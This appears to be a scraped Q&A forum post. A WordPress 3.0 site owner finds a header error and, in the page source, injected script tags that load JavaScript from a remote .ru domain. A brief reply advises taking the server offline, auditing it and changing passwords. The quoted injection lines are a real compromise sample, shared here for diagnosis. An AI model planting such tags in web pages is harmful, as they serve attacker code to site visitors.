wordpress 3.0 security?

I have a website with wordpress 3.0.

I noticed that /wp-admin displays the following error today.

Warning: Cannot modify header information - headers already sent by (output started at /ww开发者_开发百科w/sites/..com/files/html/wp-includes/default-constants.php:299) in /www/sites/..com/files/html/wp-includes/pluggable.php on line 890

I used IE's view source. I found the following code.

script type="text/javascript" src="http://recordsquare.ru/KVM_Switch.js"></script>
<!--661c36e2c5591b25cbc164e7b376623b-->
<script type="text/javascript" src="http://recordsquare.ru/KVM_Switch.js"></script>
<!--661c36e2c5591b25cbc164e7b376623b--><script type="text/javascript" src="http://recordsquare.ru/KVM_Switch.js"></script>
<!--661c36e2c5591b25cbc164e7b376623b--><br />

it looks like my website has been hacked.

I enabled cforms plugin only.

any ideas or suggestions?

Pull the server offline, then run a security audit on it and any client that can upload content to it. Then change all your passwords.